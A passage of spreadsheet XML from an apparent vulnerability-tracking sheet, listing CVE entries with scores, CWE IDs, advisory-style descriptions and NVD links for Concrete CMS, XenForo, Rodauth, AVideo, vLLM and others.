vLLM versions &gt;= 0.6.3 and &lt; 0.9.0 contain multiple regular expression denial of service (ReDoS) vulnerabilities. Several regex patterns — in vllm/lora/utils.py, the phi4mini tool parser, and the OpenAI-compatible serving chat endpoint — are susceptible to catastrophic backtracking. An attacker submitting crafted input with nested or repeated structures can trigger severe CPU consumption and performance degradation, resulting in denial of service.</t>
        </is>
      </c>
      <c r="S838" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-vfm7-4h43-gp6m</t>
        </is>
      </c>
    </row>
    <row r="839">
      <c r="A839" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B839" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C839" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68535</t>
        </is>
      </c>
      <c r="D839" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E839" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F839" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G839" s="5" t="inlineStr"/>
      <c r="H839" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I839" s="5" t="inlineStr"/>
      <c r="J839" s="5" t="inlineStr"/>
      <c r="K839" s="5" t="inlineStr"/>
      <c r="L839" s="5" t="inlineStr"/>
      <c r="M839" s="5" t="inlineStr"/>
      <c r="N839" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O839" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P839" s="5" t="inlineStr"/>
      <c r="Q839" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R839" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS Area API's block-create endpoint in versions 9.2.0 to 9.5.2 did not invoke the block type controller's validate() method on submitted data, which, for file-referencing blocks such as hero_image and gallery, is where the referenced file is authorized against the user's file-manager visibility. As a result, an authenticated user holding the block-add scope could store, and cause the page to render, a reference to a file that the file-manager authorization policy would otherwise reject, disclosing that file's URL and preview to the editor and to visitors of the affected page. Under public file storage, the URL and thumbnail are exposed directly; under private storage, the disclosure is limited by the permission-checked download URL. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.1 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N. Thanks riodrwn for reporting.</t>
        </is>
      </c>
      <c r="S839" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68535</t>
        </is>
      </c>
    </row>
    <row r="840">
      <c r="A840" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B840" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C840" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73317</t>
        </is>
      </c>
      <c r="D840" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E840" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F840" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G840" s="5" t="inlineStr"/>
      <c r="H840" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I840" s="5" t="inlineStr"/>
      <c r="J840" s="5" t="inlineStr"/>
      <c r="K840" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L840" s="5" t="inlineStr"/>
      <c r="M840" s="5" t="inlineStr"/>
      <c r="N840" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O840" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P840" s="5" t="inlineStr"/>
      <c r="Q840" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R840" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a missing authorization vulnerability in the ACP cache-rebuild dispatcher that allows limited administrators with only the rebuildCache permission to perform unauthorized approval queue actions by supplying an arbitrary job class and actor user ID in the POST body. Attackers can invoke the approval queue job under any user identity to approve queued user registrations without holding the required approval-queue or moderator permissions, causing the moderation log to attribute actions to an impersonated account.</t>
        </is>
      </c>
      <c r="S840" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t>
        </is>
      </c>
    </row>
    <row r="841">
      <c r="A841" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B841" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C841" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73319</t>
        </is>
      </c>
      <c r="D841" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E841" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F841" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G841" s="5" t="inlineStr"/>
      <c r="H841" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I841" s="5" t="inlineStr"/>
      <c r="J841" s="5" t="inlineStr"/>
      <c r="K841" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L841" s="5" t="inlineStr"/>
      <c r="M841" s="5" t="inlineStr"/>
      <c r="N841" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O841" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P841" s="5" t="inlineStr"/>
      <c r="Q841" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R841" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t>
        </is>
      </c>
      <c r="S841" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t>
        </is>
      </c>
    </row>
    <row r="842">
      <c r="A842" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B842" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C842" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73320</t>
        </is>
      </c>
      <c r="D842" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E842" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F842" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G842" s="5" t="inlineStr"/>
      <c r="H842" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I842" s="5" t="inlineStr"/>
      <c r="J842" s="5" t="inlineStr"/>
      <c r="K842" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L842" s="5" t="inlineStr"/>
      <c r="M842" s="5" t="inlineStr"/>
      <c r="N842" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O842" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P842" s="5" t="inlineStr"/>
      <c r="Q842" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R842" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve private unfurl records by supplying predictable auto-increment primary key IDs to the unfurl endpoint. Attackers can enumerate or predict result IDs and query the endpoint without any session, user, or visibility checks to obtain rendered preview HTML, original URLs, and query strings from private conversations and other restricted content.</t>
        </is>
      </c>
      <c r="S842" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t>
        </is>
      </c>
    </row>
    <row r="843">
      <c r="A843" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B843" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C843" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81915</t>
        </is>
      </c>
      <c r="D843" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E843" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F843" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G843" s="5" t="inlineStr"/>
      <c r="H843" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I843" s="5" t="inlineStr"/>
      <c r="J843" s="5" t="inlineStr"/>
      <c r="K843" s="5" t="inlineStr"/>
      <c r="L843" s="5" t="inlineStr"/>
      <c r="M843" s="5" t="inlineStr"/>
      <c r="N843" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O843" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P843" s="5" t="inlineStr"/>
      <c r="Q843" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R843" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 does not perform an object-level authorization check when a Page Type was updated. The Types::submit() dashboard controller loaded and saved the Page Type identified by a user-supplied ptID without calling canEditPageType(), so a signed-in dashboard user permitted to edit one Page Type could modify the configuration of Page Types outside their assigned authorization boundary. The update_page_type token was validated but is action- and user-scoped rather than object-scoped, so it did not constrain which Page Type could be targeted. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.1 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Andrew Gonzalez for reporting.</t>
        </is>
      </c>
      <c r="S843" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81915</t>
        </is>
      </c>
    </row>
    <row r="844">
      <c r="A844" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B844" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C844" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81916</t>
        </is>
      </c>
      <c r="D844" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E844" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F844" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G844" s="5" t="inlineStr"/>
      <c r="H844" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I844" s="5" t="inlineStr"/>
      <c r="J844" s="5" t="inlineStr"/>
      <c r="K844" s="5" t="inlineStr"/>
      <c r="L844" s="5" t="inlineStr"/>
      <c r="M844" s="5" t="inlineStr"/>
      <c r="N844" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O844" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P844" s="5" t="inlineStr"/>
      <c r="Q844" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R844" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS before 9.5.3 evaluated the authorization check for an Express entry submission against the entity of the posted form rather than the entity identified by the dashboard route. As a result, a user permitted to add entries to one Express object could create entries in a different Express object outside their authorization scope, potentially polluting protected datasets, triggering workflows, or injecting content into administrative processes. The dashboard submit route resolved the mutated entity from the attacker-controlled route ID while the permission check validated the independently posted form's entity, and the submission proceeded because the two entities were never compared. The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.1 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori from Tenzai for reporting.</t>
        </is>
      </c>
      <c r="S844" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81916</t>
        </is>
      </c>
    </row>
    <row r="845">
      <c r="A845" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B845" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C845" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81917</t>
        </is>
      </c>
      <c r="D845" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E845" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F845" s="5" t="inlineStr">
        <is>
          <t>ff5b8ace-8b95-4078-9743-eac1ca5451de</t>
        </is>
      </c>
      <c r="G845" s="5" t="inlineStr"/>
      <c r="H845" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I845" s="5" t="inlineStr"/>
      <c r="J845" s="5" t="inlineStr"/>
      <c r="K845" s="5" t="inlineStr"/>
      <c r="L845" s="5" t="inlineStr"/>
      <c r="M845" s="5" t="inlineStr"/>
      <c r="N845" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O845" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P845" s="5" t="inlineStr"/>
      <c r="Q845" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R845" s="5" t="inlineStr">
        <is>
          <t>Concrete CMS below 9.5.3 does not apply HTML output escaping to the file description and tags fields when rendering the Document Library block, so a user with permission to edit file properties could store a script payload that executed in the browser of any visitor to a page displaying the block with the description or tags column enabled, including unauthenticated visitors. Successful exploitation could allow theft of session data or actions performed in the visitor's context. The block controller returned the description and tags values without the h() escaping already applied to the title column, and the block view template wrote the returned value directly into the results table The Concrete CMS security team gave this vulnerability a CVSS v4.0 score of 5.1 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:L/VA:N/SC:H/SI:H/SA:N. Thanks Nguyen Manh Thuan for reporting.</t>
        </is>
      </c>
      <c r="S845" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81917</t>
        </is>
      </c>
    </row>
    <row r="846">
      <c r="A846" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B846" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C846" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82469</t>
        </is>
      </c>
      <c r="D846" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E846" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F846" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G846" s="5" t="inlineStr"/>
      <c r="H846" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I846" s="5" t="inlineStr"/>
      <c r="J846" s="5" t="inlineStr"/>
      <c r="K846" s="5" t="inlineStr"/>
      <c r="L846" s="5" t="inlineStr"/>
      <c r="M846" s="5" t="inlineStr"/>
      <c r="N846" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O846" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P846" s="5" t="inlineStr"/>
      <c r="Q846" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="R846" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.47.0 contains an authentication bypass vulnerability in the jwt_refresh route that issues new JWT access tokens without requiring a refresh token. Attackers can present an access token to the refresh route via non-POST methods to obtain a new valid access token, enabling indefinite account access with temporary token possession.</t>
        </is>
      </c>
      <c r="S846" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82469</t>
        </is>
      </c>
    </row>
    <row r="847">
      <c r="A847" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B847" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C847" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82470</t>
        </is>
      </c>
      <c r="D847" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E847" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F847" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G847" s="5" t="inlineStr"/>
      <c r="H847" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I847" s="5" t="inlineStr"/>
      <c r="J847" s="5" t="inlineStr"/>
      <c r="K847" s="5" t="inlineStr"/>
      <c r="L847" s="5" t="inlineStr"/>
      <c r="M847" s="5" t="inlineStr"/>
      <c r="N847" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O847" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P847" s="5" t="inlineStr"/>
      <c r="Q847" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R847" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.47.0 contains a time-based one-time password reuse vulnerability in the otp feature that fails to track the last accepted code timestamp. Attackers who observe a valid TOTP code can replay it during the drift window to bypass the second authentication factor.</t>
        </is>
      </c>
      <c r="S847" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82470</t>
        </is>
      </c>
    </row>
    <row r="848">
      <c r="A848" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B848" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C848" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89148</t>
        </is>
      </c>
      <c r="D848" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E848" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F848" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G848" s="5" t="inlineStr"/>
      <c r="H848" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I848" s="5" t="inlineStr"/>
      <c r="J848" s="5" t="inlineStr"/>
      <c r="K848" s="5" t="inlineStr"/>
      <c r="L848" s="5" t="inlineStr"/>
      <c r="M848" s="5" t="inlineStr"/>
      <c r="N848" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O848" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P848" s="5" t="inlineStr"/>
      <c r="Q848" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R848" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains an open redirect in objects/playlistSort.php. Because the endpoint is not a *.json.php script, AVideo's automatic CSRF guard (autoCSRFGuard()/forbidIfIsUntrustedRequest()) does not run, and when the request includes the sort parameter the script issues a Location header set to the unvalidated $_SERVER['HTTP_REFERER'] value without calling isSafeRedirectURL(). A remote unauthenticated attacker can therefore induce a logged-in user who can manage the targeted playlist to submit a cross-origin POST with a crafted Referer, causing the victim's playlist to be reordered and the victim's browser to be redirected from a trusted AVideo URL to an attacker-controlled site for phishing. No patched version is available.</t>
        </is>
      </c>
      <c r="S848" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89148</t>
        </is>
      </c>
    </row>
    <row r="849">
      <c r="A849" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B849" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C849" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89246</t>
        </is>
      </c>
      <c r="D849" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E849" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F849" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G849" s="5" t="inlineStr"/>
      <c r="H849" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I849" s="5" t="inlineStr"/>
      <c r="J849" s="5" t="inlineStr"/>
      <c r="K849" s="5" t="inlineStr"/>
      <c r="L849" s="5" t="inlineStr"/>
      <c r="M849" s="5" t="inlineStr"/>
      <c r="N849" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O849" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P849" s="5" t="inlineStr"/>
      <c r="Q849" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="R849" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 contains a CSV formula injection vulnerability in the myComments.download.php endpoint that fails to sanitize spreadsheet formula prefixes in comment text. Authenticated users can inject formulas starting with =, +, -, or @ characters that execute when administrators or video owners open the exported CSV file in spreadsheet applications.</t>
        </is>
      </c>
      <c r="S849" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89246</t>
        </is>
      </c>
    </row>
    <row r="850">
      <c r="A850" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B850" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C850" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90453</t>
        </is>
      </c>
      <c r="D850" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E850" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F850" s="5" t="inlineStr">
        <is>
          <t>ics-cert@hq.dhs.gov</t>
        </is>
      </c>
      <c r="G850" s="5" t="inlineStr"/>
      <c r="H850" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I850" s="5" t="inlineStr"/>
      <c r="J850" s="5" t="inlineStr"/>
      <c r="K850" s="5" t="inlineStr"/>
      <c r="L850" s="5" t="inlineStr"/>
      <c r="M850" s="5" t="inlineStr"/>
      <c r="N850" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O850" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P850" s="5" t="inlineStr"/>
      <c r="Q850" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R850" s="5" t="inlineStr">
        <is>
          <t>A file-upload handler redirects the authenticated client's browser to a URL taken directly from that same request's Referer header, without validating it against the application's own origin. This allows an authenticated attacker to craft a request that causes another user's browser to be redirected to an arbitrary external destination after completing an upload.</t>
        </is>
      </c>
      <c r="S850" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90453</t>
        </is>
      </c>
    </row>
    <row r="851">
      <c r="A851" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B851" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C851" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45057</t>
        </is>
      </c>
      <c r="D851" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E851" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F851" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G851" s="5" t="inlineStr"/>
      <c r="H851" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I851" s="5" t="inlineStr"/>
      <c r="J851" s="5" t="inlineStr"/>
      <c r="K851" s="5" t="inlineStr"/>
      <c r="L851" s="5" t="inlineStr"/>
      <c r="M851" s="5" t="inlineStr"/>
      <c r="N851" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O851" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P851" s="5" t="inlineStr"/>
      <c r="Q851" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R851" s="5" t="inlineStr">
        <is>
          <t>matrix-sdk-ui provides GUI-centric utilities on top of matrix-rust-sdk. The message edit validation logic in the  `matrix-sdk-ui` crate prior to 0.17.0 is missing a check: when replacing an encrypted event, the replacement event itself is not required to be encrypted. This enables a malicious homeserver administrators (or actors with equivalent power) to impersonate or spoof messages as if they were sent by a victim user. `matrix-sdk-ui` 0.17.0 fixes the message edit validation logic to align with the algorithm for replacement events[^1] described in the Matrix specification. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S851" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45057</t>
        </is>
      </c>
    </row>
    <row r="852">
      <c r="A852" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B852" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C852" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82467</t>
        </is>
      </c>
      <c r="D852" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E852" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F852" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G852" s="5" t="inlineStr"/>
      <c r="H852" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I852" s="5" t="inlineStr"/>
      <c r="J852" s="5" t="inlineStr"/>
      <c r="K852" s="5" t="inlineStr"/>
      <c r="L852" s="5" t="inlineStr"/>
      <c r="M852" s="5" t="inlineStr"/>
      <c r="N852" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O852" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P852" s="5" t="inlineStr"/>
      <c r="Q852" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="R852" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.47.0 fails to validate protocol-relative return-to paths in confirm_password, login_return_to_requested_location, and two_factor_auth_return_to_requested_location features. Attackers can craft paths with leading double slashes that browsers resolve as protocol-relative URLs, redirecting authenticated users to attacker-controlled sites after login or password confirmation.</t>
        </is>
      </c>
      <c r="S852" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82467</t>
        </is>
      </c>
    </row>
    <row r="853">
      <c r="A853" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B853" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C853" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82468</t>
        </is>
      </c>
      <c r="D853" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E853" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F853" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G853" s="5" t="inlineStr"/>
      <c r="H853" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I853" s="5" t="inlineStr"/>
      <c r="J853" s="5" t="inlineStr"/>
      <c r="K853" s="5" t="inlineStr"/>
      <c r="L853" s="5" t="inlineStr"/>
      <c r="M853" s="5" t="inlineStr"/>
      <c r="N853" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O853" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="P853" s="5" t="inlineStr"/>
      <c r="Q853" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R853" s="5" t="inlineStr">
        <is>
          <t>Rodauth before 2.47.0 contains a cross-site request forgery protection bypass vulnerability in the JSON request content type validation. Attackers can craft cross-origin form posts with content types containing application/json substrings to bypass CSRF token validation and force victims to authenticate to attacker-controlled accounts.</t>
        </is>
      </c>
      <c r="S853" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82468</t>
        </is>
      </c>
    </row>
    <row r="854">
      <c r="A854" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B854" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C854" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89298</t>
        </is>
      </c>
      <c r="D854" s="5" t="n">
        <v>4.9</v>
      </c>
